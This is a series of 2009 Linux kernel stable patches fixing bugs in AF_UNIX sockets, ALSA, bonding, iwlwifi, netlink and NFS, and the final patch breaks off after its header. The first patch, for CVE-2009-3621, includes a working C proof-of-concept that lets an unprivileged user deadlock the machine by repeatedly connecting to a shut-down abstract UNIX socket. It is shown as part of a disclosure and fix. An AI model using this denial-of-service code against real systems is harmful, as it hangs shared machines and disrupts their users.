--- /dev/null
+From 77238f2b942b38ab4e7f3aced44084493e4a8675 Mon Sep 17 00:00:00 2001
+From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+Date: Sun, 18 Oct 2009 23:17:37 -0700
+Subject: AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
+
+From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675 upstream.
+
+I found a deadlock bug in UNIX domain sockets that allows non-root
+users to mount a DoS attack against the local machine.
+
+How to reproduce:
+ 1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
+    namespace (*), and shutdown(2) it.
+ 2. Repeat connect(2)ing to the listening socket from other sockets
+    until the connection backlog is full.
+ 3. connect(2) spins and consumes the CPU forever. If every core is
+    taken, the system hangs.
+
+PoC code: (Run as many instances as there are cores on SMP machines.)
+
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+
+int main(void)
+{
+ int ret;
+ int csd;
+ int lsd;
+ struct sockaddr_un sun;
+
+ /* make an abstract name address (*) */
+ memset(&sun, 0, sizeof(sun));
+ sun.sun_family = PF_UNIX;
+ sprintf(&sun.sun_path[1], "%d", getpid());
+
+ /* create the listening socket and shutdown */
+ lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+ bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+ listen(lsd, 1);
+ shutdown(lsd, SHUT_RDWR);
+
+ /* connect loop */
+ alarm(15); /* forcibly exit the loop after 15 sec */
+ for (;;) {
+ csd = socket(AF_UNIX, SOCK_STREAM, 0);
+ ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+ if (-1 == ret) {
+ perror("connect()");
+ break;
+ }
+ puts("Connection OK");
+ }
+ return 0;
+}
+
+(*) Make sun_path[0] = 0 to use the abstract namespace.
+ If a file-based socket is used, the system doesn't deadlock because
+ of context switches in the file system layer.
+
+Why this happens:
+ Error checks between unix_socket_connect() and unix_wait_for_peer() are
+ inconsistent. The former calls the latter to wait until the backlog is
+ processed. Although the latter returns without doing anything when the
+ socket is shut down, the former doesn't check the shutdown state and
+ just keeps calling the latter forever.
+
+Patch:
+ The patch below adds a shutdown check to unix_socket_connect(), so
+ connect(2) to a shut-down socket will return -ECONNREFUSED.
+
+Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
+Cc: Chuck Ebbert <cebbert@redhat.com>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+
+---
+ net/unix/af_unix.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ err = -ECONNREFUSED;
+ if (other->sk_state != TCP_LISTEN)
+ goto out_unlock;
++ if (other->sk_shutdown & RCV_SHUTDOWN)
++ goto out_unlock;
+
+ if (unix_recvq_full(other)) {
+ err = -EAGAIN;
--- /dev/null
+From bd3c200e6d5495343c91db66d2acf1853b57a141 Mon Sep 17 00:00:00 2001
+From: David Henningsson <launchpad.web@epost.diwic.se>
+Date: Sun, 11 Oct 2009 11:37:22 +0200
+Subject: ALSA: ice1724 - Make call to set hw params succeed on ESI Juli@
+
+From: David Henningsson <launchpad.web@epost.diwic.se>
+
+commit bd3c200e6d5495343c91db66d2acf1853b57a141 upstream.
+
+If two streams are started immediately after one another (such as a
+playback and a recording stream), the call to set hw params fails with
+EBUSY. This patch makes the call succeed, so playback and recording will
+work properly.
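+
+For reference, a minimal userspace sketch (not part of this patch; it
+assumes the standard alsa-lib snd_pcm_set_params() call and an
+arbitrary "hw:0,0" device) of the back-to-back playback/capture setup
+that used to hit -EBUSY:
+
+#include <alsa/asoundlib.h>
+
+int main(void)
+{
+	snd_pcm_t *play, *cap;
+
+	if (snd_pcm_open(&play, "hw:0,0", SND_PCM_STREAM_PLAYBACK, 0) < 0 ||
+	    snd_pcm_open(&cap, "hw:0,0", SND_PCM_STREAM_CAPTURE, 0) < 0)
+		return 1;
+
+	/* Identical hw params requested back to back on both streams;
+	 * when the card is already running at this rate, the second
+	 * call used to fail with -EBUSY instead of succeeding. */
+	snd_pcm_set_params(play, SND_PCM_FORMAT_S16_LE,
+			   SND_PCM_ACCESS_RW_INTERLEAVED, 2, 44100, 1, 500000);
+	snd_pcm_set_params(cap, SND_PCM_FORMAT_S16_LE,
+			   SND_PCM_ACCESS_RW_INTERLEAVED, 2, 44100, 1, 500000);
+
+	snd_pcm_close(cap);
+	snd_pcm_close(play);
+	return 0;
+}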
+
+Signed-off-by: David Henningsson <launchpad.web@epost.diwic.se>
+Signed-off-by: Takashi Iwai <tiwai@suse.de>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ sound/pci/ice1712/ice1724.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/sound/pci/ice1712/ice1724.c
++++ b/sound/pci/ice1712/ice1724.c
+@@ -643,7 +643,7 @@ static int snd_vt1724_set_pro_rate(struc
+ (inb(ICEMT1724(ice, DMA_PAUSE)) & DMA_PAUSES)) {
+ /* running? we cannot change the rate now... */
+ spin_unlock_irqrestore(&ice->reg_lock, flags);
+- return -EBUSY;
++ return ((rate == ice->cur_rate) && !force) ? 0 : -EBUSY;
+ }
+ if (!force && is_pro_rate_locked(ice)) {
+ spin_unlock_irqrestore(&ice->reg_lock, flags);
--- /dev/null
+From d9d5283228d0c752f199c901fff6e1405dc91bcb Mon Sep 17 00:00:00 2001
+From: Jiri Bohac <jbohac@suse.cz>
+Date: Wed, 28 Oct 2009 22:23:54 -0700
+Subject: bonding: fix a race condition in calls to slave MII ioctls
+
+From: Jiri Bohac <jbohac@suse.cz>
+
+commit d9d5283228d0c752f199c901fff6e1405dc91bcb upstream.
+
+In mii monitor mode, bond_check_dev_link() calls the ioctl
+handler of slave devices. It stores the ndo_do_ioctl function
+pointer in a static (!) ioctl variable and later uses it to call the
+handler with the IOCTL macro.
+
+If another thread executes bond_check_dev_link() at the same time
+(even with a different bond, which none of the locks prevent), a
+race condition occurs. If the two racing slaves have different
+drivers, this may result in one driver's ioctl handler being
+called with a pointer to a net_device controlled by a different
+driver, resulting in unpredictable breakage.
+
+Unless I am overlooking something, the "static" must be a
+copy'n'paste error (?).
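+
+As a userspace analogue (illustration only, not kernel code; the names
+below are made up), two threads sharing one static function pointer can
+each end up calling through the pointer the other thread just wrote --
+the same class of race as two bonds probing slaves bound to different
+drivers:
+
+#include <pthread.h>
+#include <stdio.h>
+
+static int (*shared_op)(int);	/* analogous to the static "ioctl" */
+
+static int op_a(int x) { return x + 1; }
+static int op_b(int x) { return x * 2; }
+
+static void *probe(void *arg)
+{
+	int (*op)(int) = arg ? op_a : op_b;
+
+	shared_op = op;	/* write the shared static pointer ...         */
+	/* ... another thread may overwrite it before this call runs: */
+	printf("result %d\n", shared_op(10));
+	return NULL;
+}
+
+int main(void)
+{
+	pthread_t t1, t2;
+
+	pthread_create(&t1, NULL, probe, (void *)1);
+	pthread_create(&t2, NULL, probe, NULL);
+	pthread_join(t1, NULL);
+	pthread_join(t2, NULL);
+	return 0;
+}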
+
+Signed-off-by: Jiri Bohac <jbohac@suse.cz>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/bonding/bond_main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -691,7 +691,7 @@ static int bond_check_dev_link(struct bo
+ struct net_device *slave_dev, int reporting)
+ {
+ const struct net_device_ops *slave_ops = slave_dev->netdev_ops;
+- static int (*ioctl)(struct net_device *, struct ifreq *, int);
++ int (*ioctl)(struct net_device *, struct ifreq *, int);
+ struct ifreq ifr;
+ struct mii_ioctl_data *mii;
+
--- /dev/null
+From 371dc4a6d8c3c74a9a1c74b87c2affb3fcef6500 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <khali@linux-fr.org>
+Date: Sat, 24 Oct 2009 13:28:47 +0200
+Subject: hwmon: (it87) Fix VID reading on IT8718F/IT8720F
+
+From: Jean Delvare <khali@linux-fr.org>
+
+commit 371dc4a6d8c3c74a9a1c74b87c2affb3fcef6500 upstream.
+
+Comparing apples to bananas doesn't seem right. Consistently use the
+chips enum for chip type comparisons, to avoid such bugs in the
+future.
+
+The bug has been there since support for the IT8718F was added, so
+VID never worked for this chip nor for the similar IT8720F.
+
+Signed-off-by: Jean Delvare <khali@linux-fr.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/hwmon/it87.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -1028,12 +1028,11 @@ static int __init it87_find(unsigned sho
+ chip_type, *address, sio_data->revision);
+
+ /* Read GPIO config and VID value from LDN 7 (GPIO) */
+- if (chip_type != IT8705F_DEVID) {
++ if (sio_data->type != it87) {
+ int reg;
+
+ superio_select(GPIO);
+- if ((chip_type == it8718) ||
+- (chip_type == it8720))
++ if (sio_data->type == it8718 || sio_data->type == it8720)
+ sio_data->vid_value = superio_inb(IT87_SIO_VID_REG);
+
+ reg = superio_inb(IT87_SIO_PINX2_REG);
--- /dev/null
+From de0bd50845eb5935ce3d503c5d2f565d6cb9ece1 Mon Sep 17 00:00:00 2001
+From: Reinette Chatre <reinette.chatre@intel.com>
+Date: Fri, 11 Sep 2009 10:38:12 -0700
+Subject: iwlwifi: fix potential rx buffer loss
+
+From: Reinette Chatre <reinette.chatre@intel.com>
+
+commit de0bd50845eb5935ce3d503c5d2f565d6cb9ece1 upstream.
+
+RX handling maintains a few lists that keep track of the RX buffers.
+Buffers move from one list to the other as they are used, replenished, and
+again made available for usage. In one such instance, when a buffer is used
+it enters the "rx_used" list. When buffers are replenished an skb is
+attached to the buffer and it is moved to the "rx_free" list. The problem
+here is that the buffer is first removed from the "rx_used" list _before_ the
+skb is allocated. Thus, if the skb allocation fails, this buffer remains
+removed from the "rx_used" list and is lost for future use.
+
+Fix this by first allocating the skb before trying to attach it to a list.
+We add an additional check to not do this unnecessarily.
+
+Reported-by: Rick Farrington <rickdic@hotmail.com>
+Signed-off-by: Reinette Chatre <reinette.chatre@intel.com>
+Signed-off-by: John W. Linville <linville@tuxdriver.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/wireless/iwlwifi/iwl-rx.c | 24 +++++++++++++++++-------
+ drivers/net/wireless/iwlwifi/iwl3945-base.c | 24 ++++++++++++++++--------
+ 2 files changed, 33 insertions(+), 15 deletions(-)
+
+--- a/drivers/net/wireless/iwlwifi/iwl3945-base.c
++++ b/drivers/net/wireless/iwlwifi/iwl3945-base.c
+@@ -1196,6 +1196,7 @@ static void iwl3945_rx_allocate(struct i
+ struct iwl_rx_queue *rxq = &priv->rxq;
+ struct list_head *element;
+ struct iwl_rx_mem_buffer *rxb;
++ struct sk_buff *skb;
+ unsigned long flags;
+
+ while (1) {
+@@ -1205,17 +1206,11 @@ static void iwl3945_rx_allocate(struct i
+ spin_unlock_irqrestore(&rxq->lock, flags);
+ return;
+ }
+-
+- element = rxq->rx_used.next;
+- rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
+- list_del(element);
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
+ /* Alloc a new receive buffer */
+- rxb->skb =
+- alloc_skb(priv->hw_params.rx_buf_size,
+- priority);
+- if (!rxb->skb) {
++ skb = alloc_skb(priv->hw_params.rx_buf_size, priority);
++ if (!skb) {
+ if (net_ratelimit())
+ IWL_CRIT(priv, ": Can not allocate SKB buffers\n");
+ /* We don't reschedule replenish work here -- we will
+@@ -1224,6 +1219,19 @@ static void iwl3945_rx_allocate(struct i
+ break;
+ }
+
++ spin_lock_irqsave(&rxq->lock, flags);
++ if (list_empty(&rxq->rx_used)) {
++ spin_unlock_irqrestore(&rxq->lock, flags);
++ dev_kfree_skb_any(skb);
++ return;
++ }
++ element = rxq->rx_used.next;
++ rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
++ list_del(element);
++ spin_unlock_irqrestore(&rxq->lock, flags);
++
++ rxb->skb = skb;
++
+ /* If radiotap head is required, reserve some headroom here.
+ * The physical head count is a variable rx_stats->phy_count.
+ * We reserve 4 bytes here. Plus these extra bytes, the
+--- a/drivers/net/wireless/iwlwifi/iwl-rx.c
++++ b/drivers/net/wireless/iwlwifi/iwl-rx.c
+@@ -239,26 +239,22 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ struct iwl_rx_queue *rxq = &priv->rxq;
+ struct list_head *element;
+ struct iwl_rx_mem_buffer *rxb;
++ struct sk_buff *skb;
+ unsigned long flags;
+
+ while (1) {
+ spin_lock_irqsave(&rxq->lock, flags);
+-
+ if (list_empty(&rxq->rx_used)) {
+ spin_unlock_irqrestore(&rxq->lock, flags);
+ return;
+ }
+- element = rxq->rx_used.next;
+- rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
+- list_del(element);
+-
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
+ /* Alloc a new receive buffer */
+- rxb->skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
++ skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
+ priority);
+
+- if (!rxb->skb) {
++ if (!skb) {
+ IWL_CRIT(priv, "Can not allocate SKB buffers\n");
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+@@ -266,6 +262,20 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ break;
+ }
+
++ spin_lock_irqsave(&rxq->lock, flags);
++
++ if (list_empty(&rxq->rx_used)) {
++ spin_unlock_irqrestore(&rxq->lock, flags);
++ dev_kfree_skb_any(skb);
++ return;
++ }
++ element = rxq->rx_used.next;
++ rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
++ list_del(element);
++
++ spin_unlock_irqrestore(&rxq->lock, flags);
++
++ rxb->skb = skb;
+ /* Get physical address of RB/SKB */
+ rxb->real_dma_addr = pci_map_single(
+ priv->pci_dev,
--- /dev/null
+From f82a924cc88a5541df1d4b9d38a0968cd077a051 Mon Sep 17 00:00:00 2001
+From: Reinette Chatre <reinette.chatre@intel.com>
+Date: Thu, 17 Sep 2009 10:43:56 -0700
+Subject: iwlwifi: reduce noise when skb allocation fails
+
+From: Reinette Chatre <reinette.chatre@intel.com>
+
+commit f82a924cc88a5541df1d4b9d38a0968cd077a051 upstream.
+
+Replenishment of receive buffers is done in the tasklet handling
+received frames as well as in a workqueue. When we are in the tasklet
+we cannot sleep and thus attempt atomic skb allocations. It is generally
+not a big problem if this fails since iwl_rx_allocate is always followed
+by a call to iwl_rx_queue_restock which will queue the work to replenish
+the buffers at a time when sleeping is allowed.
+
+We thus add __GFP_NOWARN to the skb allocation in iwl_rx_allocate to
+reduce the noise if such an allocation fails while we still have enough
+buffers. We do keep the warning and the error message when we are low
+on buffers, to tell the user that there is a potential problem with
+memory availability on the system.
+
+This addresses an issue reported upstream in the thread "iwlagn: order 2 page
+allocation failures" in
+http://thread.gmane.org/gmane.linux.kernel.wireless.general/39187
+
+Signed-off-by: Reinette Chatre <reinette.chatre@intel.com>
+Acked-by: Mel Gorman <mel@csn.ul.ie>
+Signed-off-by: John W. Linville <linville@tuxdriver.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/wireless/iwlwifi/iwl-rx.c | 10 +++++++++-
+ drivers/net/wireless/iwlwifi/iwl3945-base.c | 9 ++++++++-
+ 2 files changed, 17 insertions(+), 2 deletions(-)
+
+--- a/drivers/net/wireless/iwlwifi/iwl3945-base.c
++++ b/drivers/net/wireless/iwlwifi/iwl3945-base.c
+@@ -1208,11 +1208,18 @@ static void iwl3945_rx_allocate(struct i
+ }
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
++ if (rxq->free_count > RX_LOW_WATERMARK)
++ priority |= __GFP_NOWARN;
+ /* Alloc a new receive buffer */
+ skb = alloc_skb(priv->hw_params.rx_buf_size, priority);
+ if (!skb) {
+ if (net_ratelimit())
+- IWL_CRIT(priv, ": Can not allocate SKB buffers\n");
++ IWL_DEBUG_INFO(priv, "Failed to allocate SKB buffer.\n");
++ if ((rxq->free_count <= RX_LOW_WATERMARK) &&
++ net_ratelimit())
++ IWL_CRIT(priv, "Failed to allocate SKB buffer with %s. Only %u free buffers remaining.\n",
++ priority == GFP_ATOMIC ? "GFP_ATOMIC" : "GFP_KERNEL",
++ rxq->free_count);
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+ * more buffers it will schedule replenish */
+--- a/drivers/net/wireless/iwlwifi/iwl-rx.c
++++ b/drivers/net/wireless/iwlwifi/iwl-rx.c
+@@ -250,12 +250,20 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ }
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
++ if (rxq->free_count > RX_LOW_WATERMARK)
++ priority |= __GFP_NOWARN;
+ /* Alloc a new receive buffer */
+ skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
+ priority);
+
+ if (!skb) {
+- IWL_CRIT(priv, "Can not allocate SKB buffers\n");
++ if (net_ratelimit())
++ IWL_DEBUG_INFO(priv, "Failed to allocate SKB buffer.\n");
++ if ((rxq->free_count <= RX_LOW_WATERMARK) &&
++ net_ratelimit())
++ IWL_CRIT(priv, "Failed to allocate SKB buffer with %s. Only %u free buffers remaining.\n",
++ priority == GFP_ATOMIC ? "GFP_ATOMIC" : "GFP_KERNEL",
++ rxq->free_count);
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+ * more buffers it will schedule replenish */
--- /dev/null
+From ad61df918c44316940404891d5082c63e79c256a Mon Sep 17 00:00:00 2001
+From: Jiri Pirko <jpirko@redhat.com>
+Date: Thu, 8 Oct 2009 01:21:46 -0700
+Subject: netlink: fix typo in initialization (CVE-2009-3612)
+
+From: Jiri Pirko <jpirko@redhat.com>
+
+commit ad61df918c44316940404891d5082c63e79c256a upstream.
+
+Commit 9ef1d4c7c7aca1cd436612b6ca785b726ffb8ed8 ("[NETLINK]: Missing
+initializations in dumped data") introduced a typo in
+initialization. This patch fixes this.
+
+Signed-off-by: Jiri Pirko <jpirko@redhat.com>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+Cc: Chuck Ebbert <cebbert@redhat.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ net/sched/cls_api.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -348,7 +348,7 @@ static int tcf_fill_node(struct sk_buff
+ tcm = NLMSG_DATA(nlh);
+ tcm->tcm_family = AF_UNSPEC;
+ tcm->tcm__pad1 = 0;
+- tcm->tcm__pad1 = 0;
++ tcm->tcm__pad2 = 0;
+ tcm->tcm_ifindex = qdisc_dev(tp->q)->ifindex;
+ tcm->tcm_parent = tp->classid;
+ tcm->tcm_info = TC_H_MAKE(tp->prio, tp->protocol);
--- /dev/null
+From f4373bf9e67e4a653c8854acd7b02dac9714c98a Mon Sep 17 00:00:00 2001
+From: Ben Hutchings <ben@decadent.org.uk>
+Date: Tue, 6 Oct 2009 15:42:18 -0400
+Subject: nfs: Avoid overrun when copying client IP address string
+
+From: Ben Hutchings <ben@decadent.org.uk>
+
+commit f4373bf9e67e4a653c8854acd7b02dac9714c98a upstream.
+
+As seen in <http://bugs.debian.org/549002>, nfs4_init_client() can
+overrun the source string when copying the client IP address from
+nfs_parsed_mount_data::client_address to nfs_client::cl_ipaddr. Since
+these are both treated as null-terminated strings elsewhere, the copy
+should be done with strlcpy(), not memcpy().
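+
+For illustration only (not part of the change; the buffer size below is
+arbitrary and strlcpy() is open-coded since libc may not provide it),
+this is why memcpy() with sizeof(dest) overruns a shorter source string
+while strlcpy() stops at its NUL:
+
+#include <stdio.h>
+#include <string.h>
+
+/* Minimal strlcpy() with the usual BSD/kernel semantics. */
+static size_t my_strlcpy(char *dst, const char *src, size_t size)
+{
+	size_t len = strlen(src);
+
+	if (size) {
+		size_t copy = len >= size ? size - 1 : len;
+
+		memcpy(dst, src, copy);
+		dst[copy] = '\0';
+	}
+	return len;
+}
+
+int main(void)
+{
+	char ipaddr[48];			/* stand-in for cl_ipaddr */
+	const char *src = "192.168.0.1";	/* only 12 bytes long     */
+
+	/* memcpy(ipaddr, src, sizeof(ipaddr)) would read 48 bytes from
+	 * the 12-byte string -- bytes past its terminating NUL -- which
+	 * is exactly the overrun fixed above. */
+	my_strlcpy(ipaddr, src, sizeof(ipaddr));
+	printf("%s\n", ipaddr);
+	return 0;
+}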
+
+Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/fs/nfs/client.c
++++ b/fs/nfs/client.c
+@@ -1171,7 +1171,7 @@ static int nfs4_init_client(struct nfs_c
+ 1, flags & NFS_MOUNT_NORESVPORT);
+ if (error < 0)
+ goto error;
+- memcpy(clp->cl_ipaddr, ip_addr, sizeof(clp->cl_ipaddr));
++ strlcpy(clp->cl_ipaddr, ip_addr, sizeof(clp->cl_ipaddr));
+
+ error = nfs_idmap_new(clp);
+ if (error < 0) {
--- /dev/null
+From a8b40bc7e635831b61c43acc71a86d3a68b2dff0 Mon Sep 17 00:00:00 2001
+From: Terry Loftin <terry.loftin@hp.com>
+Date: Thu, 22 Oct 2009 21:36:01 -0400
+Subject: nfs: Panic when commit fails
+
+From: Terry Loftin <terry.loftin@hp.com>
+
+commit a8b40bc7e635831b61c43acc71a86d3a68b2dff0 upstream.
+
+Actually pass the NFS_FILE_SYNC option to the server to avoid a
+panic in nfs_direct_write_complete() when a commit fails.
+
+At the end of an NFS write, if the NFS commit fails, all the writes
+will be rescheduled. They are supposed to be rescheduled as NFS_FILE_SYNC
+writes, but the rpc_task structure is not completely initialized and so
+the option is not passed. When the rescheduled writes complete, the
+return indicates that they are NFS_UNSTABLE and we try to do another
+commit. This leads to a panic because the commit data structure pointer
+was set to NULL in the initial (failed) commit attempt.
+
+Signed-off-by: Terry Loftin <terry.loftin@hp.com>
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/direct.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -457,6 +457,7 @@ static void nfs_direct_write_reschedule(
+ };
+ struct rpc_task_setup task_setup_data = {
+ .rpc_client = NFS_CLIENT(inode),
++ .rpc_message = &msg,
+ .callback_ops = &nfs_write_direct_ops,
+ .workqueue = nfsiod_workqueue,
+ .flags = RPC_TASK_ASYNC,
--- /dev/null
+From 52567b03ca38b6e556ced450d64dba8d66e23b0e Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Fri, 23 Oct 2009 14:46:42 -0400
+Subject: NFSv4: Fix a bug when the server returns NFS4ERR_RESOURCE
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 52567b03ca38b6e556ced450d64dba8d66e23b0e upstream.
+
+RFC 3530 states that when we receive the error NFS4ERR_RESOURCE, we are not
+supposed to bump the sequence number on OPEN, LOCK, LOCKU, CLOSE, etc
+operations. The problem is that we map that error into EREMOTEIO in the XDR
+layer, and so the NFSv4 middle-layer routines like seqid_mutating_err()
+and nfs_increment_seqid() don't recognise it.
+
+The fix is to defer the mapping until after the middle layers have
+processed the error.
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4proc.c | 11 ++++++++---
+ fs/nfs/nfs4xdr.c | 1 -
+ 2 files changed, 8 insertions(+), 4 deletions(-)
+
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -71,12 +71,17 @@ static int _nfs4_proc_getattr(struct nfs
+ /* Prevent leaks of NFSv4 errors into userland */
+ static int nfs4_map_errors(int err)
+ {
+- if (err < -1000) {
++ if (err >= -1000)
++ return err;
++ switch (err) {
++ case -NFS4ERR_RESOURCE:
++ return -EREMOTEIO;
++ default:
+ dprintk("%s could not handle NFSv4 error %d\n",
+ __func__, -err);
+- return -EIO;
++ break;
+ }
+- return err;
++ return -EIO;
+ }
+
+ /*
+--- a/fs/nfs/nfs4xdr.c
++++ b/fs/nfs/nfs4xdr.c
+@@ -5406,7 +5406,6 @@ static struct {
+ { NFS4ERR_SERVERFAULT, -ESERVERFAULT },
+ { NFS4ERR_BADTYPE, -EBADTYPE },
+ { NFS4ERR_LOCKED, -EAGAIN },
+- { NFS4ERR_RESOURCE, -EREMOTEIO },
+ { NFS4ERR_SYMLINK, -ELOOP },
+ { NFS4ERR_OP_ILLEGAL, -EOPNOTSUPP },
+ { NFS4ERR_DEADLOCK, -EDEADLK },
--- /dev/null
+From 141aeb9f26f9f12f1584c128ce8697cdffb046e7 Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Mon, 26 Oct 2009 08:09:46 -0400
+Subject: NFSv4: Fix two unbalanced put_rpccred() issues.
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 141aeb9f26f9f12f1584c128ce8697cdffb046e7 upstream.
+
+Commits 29fba38b (nfs41: lease renewal) and fc01cea9 (nfs41: sequence
+operation) introduce a couple of put_rpccred() calls on credentials for
+which there is no corresponding get_rpccred().
+
+See http://bugzilla.kernel.org/show_bug.cgi?id=14249
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4proc.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -3038,9 +3038,6 @@ static void nfs4_renew_done(struct rpc_t
+ if (time_before(clp->cl_last_renewal,timestamp))
+ clp->cl_last_renewal = timestamp;
+ spin_unlock(&clp->cl_lock);
+- dprintk("%s calling put_rpccred on rpc_cred %p\n", __func__,
+- task->tk_msg.rpc_cred);
+- put_rpccred(task->tk_msg.rpc_cred);
+ }
+
+ static const struct rpc_call_ops nfs4_renew_ops = {
+@@ -4855,7 +4852,6 @@ void nfs41_sequence_call_done(struct rpc
+ nfs41_sequence_free_slot(clp, task->tk_msg.rpc_resp);
+ dprintk("%s rpc_cred %p\n", __func__, task->tk_msg.rpc_cred);
+
+- put_rpccred(task->tk_msg.rpc_cred);
+ kfree(task->tk_msg.rpc_argp);
+ kfree(task->tk_msg.rpc_resp);
+
--- /dev/null
+From 3050141bae57984dd660e6861632ccf9b8bca77e Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Thu, 8 Oct 2009 11:50:55 -0400
+Subject: NFSv4: Kill nfs4_renewd_prepare_shutdown()
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 3050141bae57984dd660e6861632ccf9b8bca77e upstream.
+
+The NFSv4 renew daemon is shared between all active super blocks that refer
+to a particular NFS server, so it is wrong to be shutting it down in
+nfs4_kill_super every time a super block is destroyed.
+
+This patch therefore kills nfs4_renewd_prepare_shutdown altogether, and
+leaves it up to nfs4_shutdown_client() to also shut down the renew daemon
+by means of the existing call to nfs4_kill_renewd().
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4renewd.c | 6 ------
+ fs/nfs/super.c | 1 -
+ 2 files changed, 7 deletions(-)
+
+--- a/fs/nfs/nfs4renewd.c
++++ b/fs/nfs/nfs4renewd.c
+@@ -127,12 +127,6 @@ nfs4_schedule_state_renewal(struct nfs_c
+ }
+
+ void
+-nfs4_renewd_prepare_shutdown(struct nfs_server *server)
+-{
+- cancel_delayed_work(&server->nfs_client->cl_renewd);
+-}
+-
+-void
+ nfs4_kill_renewd(struct nfs_client *clp)
+ {
+ cancel_delayed_work_sync(&clp->cl_renewd);
+--- a/fs/nfs/super.c
++++ b/fs/nfs/super.c
+@@ -2670,7 +2670,6 @@ static void nfs4_kill_super(struct super
+ dprintk("--> %s\n", __func__);
+ nfs_super_return_all_delegations(sb);
+ kill_anon_super(sb);
+- nfs4_renewd_prepare_shutdown(server);
+ nfs_fscache_release_super_cookie(sb);
+ nfs_free_server(server);
+ dprintk("<-- %s\n", __func__);
--- /dev/null
+From 9a3936aac133037f65124fcb2d676a6c201a90a4 Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Mon, 26 Oct 2009 08:09:46 -0400
+Subject: NFSv4: The link() operation should return any delegation on the file
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 9a3936aac133037f65124fcb2d676a6c201a90a4 upstream.
+
+Otherwise, we have to wait for the server to recall it.
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/dir.c | 2 ++
